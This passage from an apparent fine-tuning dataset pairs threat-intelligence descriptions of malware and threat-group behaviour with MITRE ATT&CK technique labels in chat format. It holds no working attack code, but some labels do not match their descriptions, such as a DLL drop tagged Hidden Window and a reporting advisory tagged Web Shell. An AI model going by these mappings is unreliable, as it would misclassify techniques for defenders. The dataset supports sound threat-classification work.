shortcut using the same method previously described for the Telegram variant. The downloaded PE file (‘chrome.txt’/’mklgchrome’) gets executed each time the user starts Chrome, thereby running the real Chrome application as well as executing the MarkiRAT payload" }, { "role": "assistant", "content": "T1197 - BITS Jobs', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson contains a module to steal credentials from Web browsers on the victim machine." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once installed, JSSLoader provides the threat group with a backdoor to the victim’s computer and the organization" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa has called various native OS APIs." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of executing commands via cmd.exe." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "establishes persistence by adding a Registry Run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware platform can use Windows admin shares to move laterally." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious’ codes small footprint can help enable evasion of automated detection mechanisms based on macro content" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors deployed the MaoCheng dropper with a stolen Adobe Systems digital signature." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox." }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal has encoded binary data with Base64 and ASCII." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Netwalker can detect and terminate active security software-related processes on infected systems." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kessel has exfiltrated information gathered from the infected system to the C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE can collect data from an infected local host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 used publicly available malware for privilege escalation." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The REvil (also known as Sodinokibi) ransomware was first identified on April 17, 2019. It is used by the financially motivated GOLD SOUTHFIELD threat group, which distributes ransomware via exploit kits, scan-and-exploit techniques, RDP servers, and backdoored software installers. Secureworks® Counter Threat Unit™ (CTU) analysis suggests that REvil is likely associated with the GandCrab ransomware due to similar code and the emergence of REvil as GandCrab activity declined. CTU™ researchers attribute GandCrab to the GOLD GARDEN threat group" }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows’ Remote Desktop Protocol (RDP" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ObliqueRAT can check for blocklisted usernames on infected endpoints." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pass-The-Hash Toolkit can perform pass the hash." }, { "role": "assistant", "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When a victim opens the document, Microsoft Word asks to enable/disable macros. It reveals that a macro is embedded in the document" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Essentially, the TDSS botnet kad.dll module is more or less the same as cmd.dll in terms of control function. By running nodes.dat files containing a list of IP addresses of Kad clients in addition to ktzerlrules, which contains a command to download a new nodes.dat file from cybercriminal servers, the owners of the botnet can both include their infected computers in the publicly accessible Kad network and remove them from the network. The publicly accessible Kad network contains no more than 10 TDSS infected computers. This makes replacing the ktzerules file as inefficient as possible, which prevents other cybercriminals from taking control over the botnet. The total number of TDSS infected computers on the closed network number tens of thousands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter', 'T1588.001 - Malware', 'T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this case, a Cobalt Strike DLL file was sent through Bazar C2 traffic and saved to the infected Windows host under the user’s AppData\\Roaming directory" }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If it is successful then it will send out basic host information and await further commands." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used a Powershell cmdlet to grant the \"ApplicationImpersonation\" role to a compromised account." }, { "role": "assistant", "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay has the ability to switch between TCP and HTTP for C2 if one method is not working." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A format string that defaults to “public/Publics” that modifies characteristics of the folder and hide it from the infected user" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This backdoor adds the following registry entries to enable its automatic execution at every system startup" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM dropped additional tools to victims during their operation, including portqry.exe, a renamed cmd.exe file, winrar, and HTRAN." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can attempt to run the program as admin, then show a fake error message and a legitimate UAC bypass prompt to the user in an attempt to socially engineer the user into escalating privileges." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2. rCecms=BlackWater\". Notably, the trojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell script. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware uses cmd.exe to execute commands on victims." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This final payload is the ThreatNeedle loader running in memory. At this point the loader uses a different RC4 key (3D 68 D0 0A B1 0E C6 AF DD EE 18 8E F4 A1 D6 20), and the dropped malware is registered as a Windows service and launched" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has infected victims using watering holes." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to collect the victim's IP address." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As part of the anti-debugging or anti-monitoring techniques, ShellTea iterates over all the running processes, applies CRC32 on each process name (after converting the string to capital letters), and then compares the value against a predefined set of CRCs." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware used in a DUBNIUM attack is committed to disguising itself as Secure Shell (SSH) tool. The file descriptions and other properties of the malware look convincingly legitimate at first glance" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Linux has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism." }, { "role": "assistant", "content": "T1205 - Traffic Signaling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif droppers have used VBA macros to download and execute the malware's full executable payload." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used exploits to increase their levels of rights and privileges." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya can use \"wmic\" to help propagate itself across a network." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has utilized malicious VBS scripts in malware." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete files written to disk." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN6 has used \"kill.bat\" script to disable security tools." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHARPSTATS has the ability to employ a custom PowerShell script." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications." }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note: CTU researchers frequently observe threat actors renaming archiving tools and storing data for exfiltration in uncommon directories" }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lurid can compress data before sending it." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "spwebmember is used to enumerate and dump information from Microsoft SharePoint." }, { "role": "assistant", "content": "T1213.002 - Sharepoint" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many fields in the installation program are forged into Acrobat Reader installation program, and the interface after running is related to Acrobat Reader" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Frankenstein has used spearphishing emails to send trojanized Microsoft Word documents." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Cannon gathers system information and saves it to a file named ini. The Trojan sends an email to sahro.bella7[at]post.cz with i.ini as the attachment, S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts: Bishtr.cam47 Lobrek.chizh Cervot.woprov 2) Bishtr.cam47 3) Lobrek.chizh 4) Cervot.woprov" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kerrdown has gained execution through victims opening malicious links." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Extract the encoded payload. Decrypt the extracted payload. This uses the AES algorithm in CBC mode. Decompress the decrypted payload. This uses the LZMA algorithm. Decrypt the decompressed payload. This is simple XOR with byte key and as such does not impact compression ratio. Execute the decrypted payload as shellcode" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has exploited the CVE-2016-0167 local vulnerability." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It also checks for the existence of various tools and utilities that malware analysts often run when analyzing malicious software. It also leverages Structured Exception Handling (SEH) to patch its own code. These measures are all designed to impede the analysis process and make it more expensive to identify what the malware is actually designed to do from a code execution flow perspective. Below the EAX register is stored in a variable to be reused later in order to allocate a heap memory chunk to initiate its own unpacked code. The malware also uses others techniques to make analysis significantly more difficult, like creating hundreds of case comparisons, which makes tracing code much harder. Below an example of several if conditional statements in pseudo code demonstrating this process and how it can result in impeding the ability to efficiently trace the code. In order to decrypt the malware code it's installs an exception handler, which is responsible for decrypting some memory bytes to continue it's execution. Below you can see the SEH has just been initialized: In the same routine, it performs the decryption routine for the following code. The strings are encrypted using an XOR value, however each string uses a separate XOR value preventing an easy detection mechanism. Below is some IDA Python code which can be used to decrypt strings" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As a previous write-up on H1N1 by Arbort Networks describes, the LINK command in this instance results in H1N1 downloading and executing a file from a remotely hosted URL using WinINet HTTP requests. The loader also has the functionality of downloading and executing a base64 encoded file contained in the response from the command and control server via the FILE command" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack can retrieve browser history." }, { "role": "assistant", "content": "T1217 - Browser Bookmark Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has a tool called CANDYKING to capture a screenshot of user's desktop." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some malware uses multiple channels for C2, such as RomeoWhiskey-Two, which consists of a RAT channel that parses data in datagram form and a Proxy channel that forms virtual point-to-point sessions." }, { "role": "assistant", "content": "T1026 - Multiband Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has used RDP during operations." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has performed DLL search order hijacking to execute their payload." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An loader Trojan adds the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence." }, { "role": "assistant", "content": "T1037 - Boot or Logon Initialization Scripts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware uses PowerShell and WMI to script data collection and command execution on the victim." }, { "role": "assistant", "content": "T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ccf32 can run on a daily basis using a scheduled task." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ryuk has called \"CreateToolhelp32Snapshot\" to enumerate all running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can determine the Windows version and computer name on a compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server." }, { "role": "assistant", "content": "T1190 - Exploit Public-Facing Application" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShimRat can be issued a command shell function from the C2." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook can collect local files from the system ." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can obtain data from local systems." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used a cron job for persistence on Mac devices." }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To report an intrusion and request resources for incident response or technical assistance, you are encouraged to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).Protect Against SQL Injection and Other Attacks on Web ServicesTo protect against code injections and other attacks, system operators should routinely evaluate known and published vulnerabilities, periodically perform software updates and technology refreshes, and audit external-facing systems for known web application vulnerabilities" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Send exfiltrated data taskkill.exe Ends working cycle of modules Persistence Persistence modules are based on scheduled tasks and system registry" }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems." }, { "role": "assistant", "content": "T1187 - Forced Authentication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# 